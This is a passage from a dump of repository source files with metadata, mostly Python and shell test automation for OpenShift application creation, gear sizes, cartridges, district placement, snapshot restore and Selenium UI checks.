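        data = builder()  # e.g. a fresh dump taken from the broker's mongo
        with open(path, 'wb') as f:
            pickle.dump(data, f)
        return data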
encodeURI(encodeURI(text_value))\n $.get(\"\", null, function(response){\n // get the callback value, and fill it into the result div\n $(\"#result\").html(response);\n });\n */\n }\n });\n\n // add keyup for text.\n $(\"#user_name\").keyup(function(){\n var text_value = $(\"#user_name\").val();\n if (text_value == \"\") {\n $(this).addClass(\"user_text\");\n }\n else {\n $(this).removeClass(\"user_text\");\n }\n });\n});\n" }, { "alpha_fraction": 0.6733333468437195, "alphanum_fraction": 0.6959999799728394, "avg_line_length": 36.5, "blob_id": "6259b02de1a5ed3f308d8347f13c50000d208278", "content_id": "15f54c39b26ecfba76e124f072e58076522fd2c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 750, "license_type": "no_license", "max_line_length": 154, "num_lines": 20, "path": "/automation/open/Longevity/basic_test.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "###step 1 : Create app\napp_create $1\nurl_check $app_name\n\n###step 2 : hot_deploy\n./hot_deply.sh $app_name\n\n###step 3 : cartridge_add mysql\nrun cartridge_add mysql-5.1 $app_name\n\n###step 4 : mysql insert\napp_path=`rhc app show -a $1 -p$passwd|grep -A0 \"SSH:\"|awk '{print $2}'`\necho \"$1 SSH path is : $app_path\"\ncartridge_dir=`ssh $app_path env|grep OPENSHIFT_PRIMARY_CARTRIDGE_DIR|cut -d'=' -f2`\ninsert_sql=\"create table test(id int(8), name char(20));insert into test values('0','openshift');insert into test values('1','nsun');select * from test;\"\nssh $app_path \"echo '$insert_sql' > '$cartridge_dir'/mysql_insert.sql\"\n\n###step* : app operation test\napp_operations=\"status start restart reload stop force-stop tidy delete\"\nrun app_oper_testing $app_name\n" }, { "alpha_fraction": 0.4703063368797302, "alphanum_fraction": 0.48485368490219116, "avg_line_length": 41.340579986572266, "blob_id": "0219a9b54359dcac5117db13812837543f41a075", "content_id": "b499b5a902c5b834e5bbfadae9c7e5a85077cf81", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5843, "license_type": "no_license", "max_line_length": 300, "num_lines": 138, "path": "/automation/open/testmodules/RT/node/gear_size.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\n\"\"\"\nimport common, OSConf\nimport rhtest\n\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n ITEST = 'DEV'\n\n def initialize(self):\n self.info(\"[US1373][UI][CLI] Pick gear size + [US1908][BusinessIntegration][Marketing]Allotment: Small and medium gears\")\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = \"php\"\n self.app_type = common.app_types[self.test_variant]\n self.app_name = \"my%s\" % ( common.getRandomString() )\n common.env_setup()\n\n def finalize(self):\n self.gear_and_user_revert()\n\n\nclass GearSize(OpenShiftTest):\n def verify_cgroup_threshold(self, app_name, gear_size):\n\n thresholds = {\n \"small\" : { \"memory\" : 536870912, \"swap\" : 641728512, \"cpu\" : 128 },\n \"medium\" : { \"memory\" : 1073741824, \"swap\" : 1178599424, \"cpu\" : 128 },\n #\"large\" : { \"memory\" : 2147483648, \"swap\" : 2252341248, \"cpu\" : 128 }, #not supported\n }\n uuid = OSConf.get_app_uuid(app_name)\n\n if common.get_cgroup_threshold(uuid, \"memory\", \"limit_in_bytes\") == thresholds[gear_size][\"memory\"] and common.get_cgroup_threshold(uuid, \"memory\", \"memsw.limit_in_bytes\") == 
thresholds[gear_size][\"swap\"] and common.get_cgroup_threshold(uuid, \"cpu\", \"shares\") == thresholds[gear_size][\"cpu\"]:\n return True # Success, it's a Python function\n else:\n return False # Failure\n\n def gear_and_user_revert(self):\n common.change_node_profile(\"small\")\n common.remove_gearsize_capability('medium') #default\n\n def test_method(self):\n\n for gear_size in [ \"small\", \"medium\" ]:\n self.add_step(\"Changing the node profile to %s\" % ( gear_size ),\n common.change_node_profile,\n function_parameters = [ gear_size ],\n expect_description = \"Node profile must be changed successfully\",\n expect_return = 0)\n\n self.add_step(\n \"Creating application with gear size '%s'\" % ( gear_size ),\n common.create_app,\n function_parameters = [ self.app_name + gear_size, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False, \n \"./\", \n False, \n gear_size ],\n expect_description = \"The application must be created successfully\",\n expect_return = 0,\n try_count=3,\n try_interval=10)\n\n self.add_step(\n \"Verifying that resource limits are applied for cgroups\",\n self.verify_cgroup_threshold,\n function_parameters = [ self.app_name + gear_size, gear_size],\n expect_description = \"Cgroup thresholds must match\",\n expect_return = True) # This is a Python function\n\n self.add_step(\n \"Destroying the application with gear size '%s'\" % ( gear_size ),\n common.destroy_app,\n function_parameters = [ self.app_name + gear_size, self.user_email, self.user_passwd ],\n expect_description = \"The application must be destroyed successfully\",\n expect_return = 0)\n\n if gear_size == \"small\":\n\n for larger_gear_size in [ \"medium\" ]:\n self.add_step(\n \"Creating an application with gear size '%s' without medium_profile capability flag\" % ( larger_gear_size ),\n common.create_app,\n function_parameters = [ self.app_name + \"0\" + larger_gear_size, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False, \n \"./\", \n False, \n larger_gear_size ],\n expect_description = \"The operation must fail\",\n #expect_str = [\"Invalid Size\"],\n expect_return = \"!0\")\n\n self.add_step(\n \"Setting medium_capability flag\",\n common.add_gearsize_capability,\n function_parameters = [ 'medium'],\n expect_description = \"gearsize MEDIUM capability must be configured successfully\",\n expect_return = 0)\n\n self.add_step(\"Creating an application with an invalid gear size\",\n common.create_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.user_email, \n self.user_passwd, \n False, \n \"./\", \n False, \n \"smallXXXXXX\" ],\n expect_description = \"The creation of the application must fail\",\n expect_return = \"!0\")\n\n self.run_steps()\n \n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(GearSize)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.4098873734474182, "alphanum_fraction": 0.44847726821899414, "avg_line_length": 37.34400177001953, "blob_id": "3c9989d0237514c6cfb6ea93381187b432cf7b4a", "content_id": "359e983b59c0e71ff1dfe791dd83c4f110b19c45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4794, "license_type": "no_license", "max_line_length": 117, "num_lines": 125, "path": "/automation/open/lib/common/consts.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": 
"import os\nfrom helper import get_instance_ip\n\nif os.environ.has_key('RHTEST_ORIGIN') and os.environ['RHTEST_ORIGIN'] == '1':\n app_types = {\n 'php' : 'php-5.4',\n 'ruby' : 'ruby-1.9',\n 'ruby-1.9' : 'ruby-1.9',\n 'rack' : 'ruby-1.9', #for backward compatibility...\n 'python' : 'python-2.7',\n 'python-3.3' : 'python-3.3',\n 'perl' : 'perl-5.16' ,\n 'raw' : 'diy-0.1',\n 'diy' : 'diy-0.1',\n 'nodejs' : 'nodejs-0.6',\n 'jenkins' : 'jenkins-1.4'}\n cartridge_types = {\n 'mongodb' : 'mongodb-2.2',\n 'mongo' : 'mongodb-2.2',\n 'cron' : 'cron-1.4',\n 'mysql' : 'mysql-5.1',\n 'postgresql' : 'postgresql-9.2',\n '10gen' : '10gen-mms-agent-0.1',\n 'phpmyadmin' : 'phpmyadmin-3.4',\n 'metrics' : 'metrics-0.1',\n 'phpmoadmin' : 'phpmoadmin-1.0',\n 'switchyard' : 'switchyard-0.6',\n 'haproxy' : 'haproxy-1.4 ',\n 'jenkins-client': 'jenkins-client-1.4',\n 'jenkins' : 'jenkins-client-1.4'}\nelse:\n app_types = { 'jbossas': 'jbossas-7',\n 'jbosseap-6.0': 'jbosseap-6.0',\n 'jbosseap': 'jbosseap-6.0',\n 'jbossews': 'jbossews-1.0',\n 'jbossews-1.0': 'jbossews-1.0',\n 'jbossews-2.0': 'jbossews-2.0',\n 'jbossews2': 'jbossews-2.0',\n 'php': 'php-5.3',\n 'ruby': 'ruby-1.8',\n 'ruby-1.8': 'ruby-1.8',\n 'ruby-1.9': 'ruby-1.9',\n 'rack': 'ruby-1.8', #for backward compatibility...\n 'python': 'python-2.6',\n 'python-2.6': 'python-2.6',\n 'python27': 'python-2.7',\n 'python-2.7':'python-2.7',\n 'python-3.3':'python-3.3',\n 'wsgi': 'python-2.6', #for backward compatibility...\n 'perl-5.10': 'perl-5.10',\n 'perl': 'perl-5.10' ,\n 'raw': 'diy-0.1',\n 'diy': 'diy-0.1',\n 'diy-0.1': 'diy-0.1',\n 'nodejs-0.6': 'nodejs-0.6',\n 'nodejs': 'nodejs-0.6',\n 'jenkins' : 'jenkins-1.4',\n 'zend' : 'zend-5.6'}\n cartridge_types = { 'mongodb' : 'mongodb-2.2',\n 'mongodb2.0' : 'mongodb-2.0',\n 'cron': 'cron-1.4', \n 'mysql': 'mysql-5.1', \n 'postgresql' : 'postgresql-8.4', \n '10gen' : '10gen-mms-agent-0.1', \n 'phpmyadmin': 'phpmyadmin-3.4', \n 'haproxy': 'haproxy-1.4', \n 'metrics' : 'metrics-0.1', \n 'phpmoadmin' : 'phpmoadmin-1.0', \n 'rockmongo': 'rockmongo-1.1', \n 'jenkins' : 'jenkins-client-1.4'}\n\nAPP_TYPES = app_types\nCARTRIDGE_TYPES = cartridge_types\n\ncartridge_deps = {'10gen': 'mongodb', \n 'phpmyadmin': 'mysql', \n 'phpmoadmin': 'mongodb', \n 'rockmongo': 'mongodb'}\n\nCARTRIDGE_DEPS = cartridge_deps\n\nAPP_SUFFIX = {\"php\": \".php\",\n \"nodejs\": '.js',\n \"ruby\": \".rb\",\n \"ruby-1.9\" : \".rb\",\n \"rack\": \".rb\",\n \"jbossas\": \".jsp\",\n \"jbosseap\": \".jsp\",\n \"jbossews\": \".jsp\",\n \"perl\": \".pl\",\n \"python\": \".py\",\n \"wsgi\": \".py\"}\n\n\nMAX_GEARS = 3 # normal max gears count\nDEV_MAX_GEARS = 20 # max gears count used for testing on DEV\n\nRHC_CLIENT_TIMEOUT = 360\n\ninstance_ip = get_instance_ip()\nif instance_ip == 'int.openshift.redhat.com':\n run_mode = 'INT'\nelif instance_ip == 'stg.openshift.redhat.com':\n run_mode = 'STG'\nelif instance_ip == 'openshift.redhat.com':\n run_mode = 'PROD'\nelif instance_ip.find(\"example.com\") != -1 or instance_ip.find(\"test.com\") != -1 or instance_ip.find(\"broker\") != -1:\n run_mode = 'OnPremise'\nelse:\n run_mode = 'DEV'\n\nif os.environ.has_key('RHTEST_RHC_CLIENT_OPTIONS'):\n RHTEST_RHC_CLIENT_OPTIONS = os.getenv('RHTEST_RHC_CLIENT_OPTIONS')\nelse:\n RHTEST_RHC_CLIENT_OPTIONS = \"--insecure --timeout %s\"% RHC_CLIENT_TIMEOUT\n# if run_mode in ('DEV', 'INT'):\n# RHTEST_RHC_CLIENT_OPTIONS = \"--insecure --timeout %s\"% RHC_CLIENT_TIMEOUT\n# else:\n# RHTEST_RHC_CLIENT_OPTIONS = \"--timeout %s\"% RHC_CLIENT_TIMEOUT\n\n# For all of the network 
operations:\nif os.getenv('RHTEST_REST_TIMEOUT'):\n CONNECT_TIMEOUT = int(os.getenv('RHTEST_REST_TIMEOUT'))\nelse:\n CONNECT_TIMEOUT = 360\n\n" }, { "alpha_fraction": 0.5941835641860962, "alphanum_fraction": 0.6136606335639954, "avg_line_length": 34.68571472167969, "blob_id": "0821ef5fb0f622e56f016b464ea9b7e70b8323fe", "content_id": "df5aef71d8d2639a14491aaa71dcbb54dbbe7d5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3748, "license_type": "no_license", "max_line_length": 99, "num_lines": 105, "path": "/automation/open/testmodules/RT/node/DeployAppInto1districtComprisedOfMultiNodes.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: DeployAppInto1districtComprisedOfMultiNodes.py\n# Date: 2012/08/29 11:36\n# Author: [email protected]\n#\n\nimport common\nimport rhtest\nimport OSConf\nimport brokerdb\n\n\nclass OpenShiftTest(rhtest.Test):\n ITEST = [\"DEV\"]\n\n def initialize(self):\n self.info(\"DeployAppInto1districtComprisedOfMultiNodes\")\n try:\n self.test_variant = self.get_variant()\n except:\n self.test_variant = 'php'\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name1 = common.getRandomString(10)\n self.app_name2 = common.getRandomString(10)\n self.district_name = common.getRandomString(10)\n common.env_setup()\n\n def finalize(self):\n pass\n\n\nclass DeployAppInto1districtComprisedOfMultiNodes(OpenShiftTest):\n def test_method(self):\n self.info(\"Creating new district...\")\n (ret, output) = common.create_district(self.district_name)\n self.assert_equal(0, ret, \"Unable to create district: %s\" % output)\n\n nodes = common.get_nodes()\n pnodes = []\n for node in nodes:\n pnodes.append(common.get_public_ip_from_private(node))\n self.assert_true((len(nodes) >= 2), \"There must be at least 2 nodes...\")\n for node in nodes:\n ret = common.add_node2district(self.district_name, node)\n self.assert_equal(0, ret, \"Error during adding node into district\")\n # Creating 1st app\n self.info(\"Creating app#1...\")\n (ret, status) = self.config.rest_api.app_create(self.app_name1, \n common.app_types[self.test_variant])\n self.assert_equal('Created', ret, \"Error during creating app#1 - %s\"%self.app_name1)\n self.info(\"Waiting...\")\n common.sleep(90)\n self.info(\"Creating app#2...\")\n (ret, status) = self.config.rest_api.app_create(self.app_name2, \n common.app_types[self.test_variant])\n self.assert_equal('Created', ret, \"Error during creating app#2 - %s\"%self.app_name2)\n (gear_group1, gear_count) = self.config.rest_api.get_gears(self.app_name1)\n app1_gear = gear_group1[0]['gears'][0]['id']\n (gear_group2, gear_count) = self.config.rest_api.get_gears(self.app_name2)\n app2_gear = gear_group2[0]['gears'][0]['id']\n app1_node = None\n app2_node = None\n gears = {}\n print \"*\"*80\n for node in pnodes:\n gears[node] = common.get_gears_per_node(node)\n if gears[node].has_key(app1_gear):\n print \"\\tApp1's gear[%s] is deployed on %s\"%(app1_gear, node)\n app1_node = node\n if gears[node].has_key(app2_gear):\n print \"\\tApp2's gear[%s] is deployed on %s\"%(app2_gear, node)\n app2_node = node\n print \"*\"*80\n self.assert_true((app1_node != app2_node), \"App1 should not reside on the same node as App2\")\n '''\n db = brokerdb.BrokerDB(collections = ['district'])\n districts = db.get_collection('district')\n print \"DISTRICTS: [UUID | NAME | NODES]\"\n for district in districts:\n #print district.keys()\n print \"\\t\",district['uuid'], 
district['name'], district['server_identities']\n print uuid1,uuid2\n '''\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(DeployAppInto1districtComprisedOfMultiNodes)\n return suite\n\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of DeployAppInto1districtComprisedOfMultiNodes.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5114549398422241, "alphanum_fraction": 0.5211706757545471, "avg_line_length": 41.53571319580078, "blob_id": "29bb558de642ded35e650027f789a9ead6f9760f", "content_id": "898bd25c7cf27366c031caadcd7581be0b46b12e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8337, "license_type": "no_license", "max_line_length": 198, "num_lines": 196, "path": "/automation/open/testmodules/RT/client/snapshot_restore_data_dir_to_existing_app.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = os.environ[\"OPENSHIFT_user_email\"]\n self.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n try:\n self.test_variant = self.config.test_variant\n except:\n print \"OPENSHIFT_test_name environment variable is not set. Running test with default php\"\n self.test_variant = \"zend\"\n\n self.app_type = common.app_types[self.test_variant]\n self.app_name = self.test_variant.split('-')[0] + common.getRandomString(5)\n tcms_testcase_id = 107695\n if self.test_variant == \"perl\":\n file_name = \"index.pl\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/perl/index.pl\" %(self.app_name)\n url_path1 = \"index.pl?action=create\"\n url_path2 = \"index.pl?action=modify\"\n url_path3 = \"index.pl\"\n elif self.test_variant in (\"php\", \"zend\"):\n file_name = \"index.php\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/php/index.php\" %(self.app_name)\n url_path1 = \"index.php?action=create\"\n url_path2 = \"index.php?action=modify\"\n url_path3 = \"index.php\"\n elif self.test_variant in (\"ruby\", \"rack\", \"ruby-1.9\"):\n file_name = \"rack/*\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"python\", \"wsgi\"):\n file_name = \"application.py\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant == \"python-2.7\":\n file_name = \"applicationpython-2.7.py\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant == \"python-3.3\":\n file_name = \"applicationpython-3.3.py\"\n source_file = 
\"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/wsgi/application\" %(self.app_name)\n url_path1 = \"create\"\n url_path2 = \"modify\"\n url_path3 = \"show\"\n elif self.test_variant in (\"jbossas\", \"jbosseap\", \"jbossews\", \"jbossews2\"):\n file_name = \"test.jsp\"\n source_file = \"%s/data/snapshot_restore_data_dir/%s\" %(WORK_DIR, file_name)\n target_file = \"%s/src/main/webapp/%s\" %(self.app_name, file_name)\n url_path1 = \"%s?action=create\" %(file_name)\n url_path2 = \"%s?action=modify\" %(file_name)\n url_path3 = \"%s\" %(file_name)\n else:\n raise rhtest.TestIncompleteError(\"Uknown variant name\")\n\n self.file_name = file_name\n self.target_file = target_file\n self.source_file = source_file\n self.url_path1 = url_path1\n self.url_path2 = url_path2\n self.url_path3 = url_path3\n \n tcms_testcase_id=107695\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass SnapshotRestoreDataDirToExistingApp(OpenShiftTest):\n def test_method(self):\n\n step = testcase.TestCaseStep(\"Create a %s application\" %(self.app_type),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.user_email, self.user_passwd],\n expect_return=0,\n expect_description=\"App should be created successfully\"\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Copying test files to app git repo\",\n \"cp -f %s %s\" %(self.source_file, self.target_file),\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Do git commit\",\n \"cd %s && git add . && git commit -m test && git push\" %(self.app_name),\n expect_return=0,\n expect_description=\"File and directories are added to your git repo successfully\"\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Get app url\",\n OSConf.get_app_url,\n function_parameters = [self.app_name]\n )\n self.steps_list.append(step)\n\n def verify(suffix, str_l):\n url=OSConf.get_app_url(self.app_name)\n return common.grep_web_page(\"%s/%s\"%(url,suffix), str_l )\n\n step = testcase.TestCaseStep(\"Access app's URL to create files in OPENSHIFT_DATA_DIR directory\",\n verify,\n function_parameters=[self.url_path1, [\"Welcome\", \"RESULT=0\"]],\n expect_return=0,\n try_interval=12,\n try_count=10)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Take snapshot\",\n \"rhc snapshot save %s -f %s -l %s -p %s %s\" %(self.app_name, \"%s.tar.gz\"%(self.app_name), self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0\n )\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Access app's URL to modify files in OPENSHIFT_DATA_DIR directory\",\n verify,\n function_parameters=[self.url_path2, [\"Welcome\", \"RESULT=0\"]],\n expect_return=0,\n try_interval=12,\n try_count=10\n )\n# self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\"Restore app from snapshot\",\n \"rhc snapshot restore %s -f %s -l %s -p '%s' %s\" %(self.app_name, \"%s.tar.gz\"%(self.app_name), self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0\n )\n self.steps_list.append(step)\n\n\n step = testcase.TestCaseStep(\"Access app's URL to check OPENSHIFT_DATA_DIR dir is restored\",\n verify,\n function_parameters=[self.url_path3, [\"Welcome\", \"snapshot_restore_data_dir_test1\"]],\n expect_return=0,\n try_interval=12,\n try_count=10\n )\n self.steps_list.append(step)\n\n\n case = testcase.TestCase(\"[US566][rhc-client] Archive/Restore data to updated 
application\\n[rhc-client]Create snapshot using rhc snapshot\",\n self.steps_list\n )\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreDataDirToExistingApp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6038035154342651, "alphanum_fraction": 0.6188589334487915, "avg_line_length": 20.016666412353516, "blob_id": "4ff99ffad4f8e90aa243fbd27d8aacfc3ef960ac", "content_id": "1c4d57f05c481e22fac363bc1cdb28f872bcac15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1262, "license_type": "no_license", "max_line_length": 71, "num_lines": 60, "path": "/automation/open/testmodules/UI/web/create_domain.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: create_domain.py\n# Date: 2012/07/04 10:56\n# Author: [email protected]\n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Create_Domain(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n time.sleep(5)\n\n # Create domain name\n web.go_to_domain_edit()\n time.sleep(3)\n web.input_by_id(\"domain_name\", web.config.OPENSHIFT_user_email)\n web.click_element_by_id(\"domain_submit\")\n time.sleep(20)\n web.assert_text_equal_by_xpath('Your domain has been created',\n '''//div[@id='flash']/div''')\n\n self.tearDown()\n\n return self.passed(\"Create domain name finished.\")\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Create_Domain)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of create_domain.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab:\n" }, { "alpha_fraction": 0.689230740070343, "alphanum_fraction": 0.689230740070343, "avg_line_length": 33.21052551269531, "blob_id": "6f50417ebad3b22646dc0fd902db512ffdef0b21", "content_id": "1c99a0a95fb04e2f346ebe91edfaacc34c7d9563", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 650, "license_type": "no_license", "max_line_length": 71, "num_lines": 19, "path": "/automation/open/testmodules/RT/cartridge/app_template/django_custom/mydiyapp/urls.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from django.conf.urls.defaults import patterns, include, url\nimport djangotools\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'myrawapp.views.home', name='home'),\n # url(r'^myrawapp/', include('myrawapp.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n # url(r'^admin/', include(admin.site.urls)),\n url(r'^version/', 'djangotools.views.display_version'),\n)\n" }, { "alpha_fraction": 0.6017287373542786, 
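Aside: create_domain.py above paces the browser with fixed time.sleep calls of up to 20 seconds. Selenium's standard explicit waits poll for a condition and return as soon as it holds, which is usually faster and less flaky; a small sketch (wait_for_flash is a hypothetical helper, not part of this repository):

    from selenium.webdriver.common.by import By
    from selenium.webdriver.support.ui import WebDriverWait
    from selenium.webdriver.support import expected_conditions as EC

    def wait_for_flash(driver, text, timeout=20):
        # Block until the flash banner contains the expected message.
        WebDriverWait(driver, timeout).until(
            EC.text_to_be_present_in_element(
                (By.XPATH, "//div[@id='flash']/div"), text))

    # Usage: wait_for_flash(web.driver, 'Your domain has been created')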
"alphanum_fraction": 0.6130319237709045, "avg_line_length": 27.903846740722656, "blob_id": "8ca923c66432371d69958da2e2fded3c510dc8e9", "content_id": "7bbe28d80aac7a023e12735553af50a11b14e27e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1504, "license_type": "no_license", "max_line_length": 102, "num_lines": 52, "path": "/automation/open/testmodules/RT/cartridge/jbossews_java7.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n\"\"\"\nAttila Nagy\[email protected]\n\nJul 26, 2012\n\"\"\"\n\nimport rhtest\nimport common\nimport os\nfrom shutil import rmtree\nfrom time import sleep\nfrom jbossas_java7 import JBossJava7Test\n\nclass EWSJava7Test(JBossJava7Test):\n\n def __init__(self, config):\n JBossJava7Test.__init__(self, config)\n self.config.application_type = common.app_types[\"jbossews\"]\n self.config.git_repo = \"./%s\" % self.config.application_name\n self.config.summary = \"[US2513] Java 7 with non-scaling JbossEWS application\"\n \n# def deploy_version_checking_app(self):\n# os.mkdir(self.config.git_repo + \"/webapps/testing/\")\n# # Editing file\n# jsp_file = open(self.config.git_repo + \"/webapps/testing/version.jsp\", \"w\")\n# jsp_file.write('<%@ page contentType=\"text/plain\" %>\\n')\n# jsp_file.write('<%@ page trimDirectiveWhitespaces=\"true\" %>\\n')\n# jsp_file.write('<% out.println(\"Java version: \" + System.getProperty(\"java.version\")); %>\\n')\n# jsp_file.close()\n# # Deploying\n# deployment_steps = [\n# \"cd %s\" % self.config.git_repo,\n# \"git add .\",\n# \"git commit -a -m testing\",\n# \"git push\"\n# ]\n# common.command_get_status(\" && \".join(deployment_steps))\n \nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EWSJava7Test)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n" }, { "alpha_fraction": 0.6721928715705872, "alphanum_fraction": 0.6788623929023743, "avg_line_length": 76.45756530761719, "blob_id": "e422d38109c7c118821a20ee50828d355b83d659", "content_id": "58eca8441865b6fdadf867050771323b142d614d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20991, "license_type": "no_license", "max_line_length": 294, "num_lines": 271, "path": "/automation/open/testmodules/UI/web/tc_express.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport config\nimport HTMLTestRunner\n\nclass Express(unittest.TestCase):\n\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n \n def test_check_express_about(self):\n # baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.assert_text_equal_by_css(self,\"WHAT\\'S EXPRESS?\",\"#about > header > h1\")\n baseutils.assert_text_equal_by_xpath(self,\"Looking for a fast on-ramp to the Cloud? 
Get Java, Ruby, PHP, Perl and Python apps in the cloud with the command-line and Git in just a few mintes.\",\"//*[@id='about']/p[1]\")\n baseutils.assert_text_equal_by_xpath(self,\"Install\",\"//*[@id='about']/h2[1]\")\n baseutils.assert_text_equal_by_xpath(self,\"Download and install the OpenShift Express client tools so you can deploy and manage your application in the cloud.\",\"//section[@id='about']/p[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Create\",\"//*[@id='about']/h2[2]\")\n baseutils.assert_text_equal_by_xpath(self,\"Create a subdomain for your application and clone the Git master repository from the cloud.\",\"//section[@id='about']/p[3]\") \n baseutils.assert_text_equal_by_xpath(self,\"Deploy\",\"//*[@id='about']/h2[3]\")\n baseutils.assert_text_equal_by_xpath(self,\"Add your application code to the Git repository and push to the cloud. Congratulations, your application is live!\",\"//section[@id='about']/p[4]\")\n\n def test_check_express_videos(self):\n # baseutils.go_to_home(self)\n baseutils.go_to_express(self)\n baseutils.click_element_by_link_text(self,\"Videos\")\n 